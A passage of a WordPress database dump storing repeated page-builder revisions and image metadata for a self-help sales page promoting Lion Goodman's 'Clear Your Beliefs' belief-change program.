new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2295:"<div id="divStroke"><p><strong>I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="alignleft size-full wp-image-1468" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(946, 1469, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2345:"<p>&lt;div&gt;</p><p><strong>I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies. </p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.” </p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun? </p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey. </p><p>Warmly,</p><p><img class="alignleft size-full wp-image-1468" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p> </p><p> </p><p> </p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong> </p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward. </p><p><strong>Click HERE to Learn More</strong></p><p>&lt;/div&gt;</p>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(948, 1471, '_wp_attached_file', '2014/10/pic.png'),
(949, 1471, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:157;s:6:"height";i:196;s:4:"file";s:15:"2014/10/pic.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:15:"pic-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(950, 1472, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2448:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(951, 1473, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2517:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(953, 1474, '_wp_attached_file', '2014/10/ebook.png'),
(954, 1475, '_wp_attached_file', '2014/10/ebook1.png'),
(955, 1476, '_wp_attached_file', '2014/10/ebook2.png'),
(956, 1476, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:600;s:6:"height";i:890;s:4:"file";s:18:"2014/10/ebook2.png";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"ebook2-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:18:"ebook2-202x300.png";s:5:"width";i:202;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:18:"ebook2-220x220.png";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:9:"image/png";}s:15:"product-display";a:4:{s:4:"file";s:18:"ebook2-400x400.png";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:18:"ebook2-170x200.png";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:14:"post-thumbnail";a:4:{s:4:"file";s:18:"ebook2-600x372.png";s:5:"width";i:600;s:6:"height";i:372;s:9:"mime-type";s:9:"image/png";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:18:"ebook2-600x576.png";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(958, 1477, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:233:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]<img class="aligncenter size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" />[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2517:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" 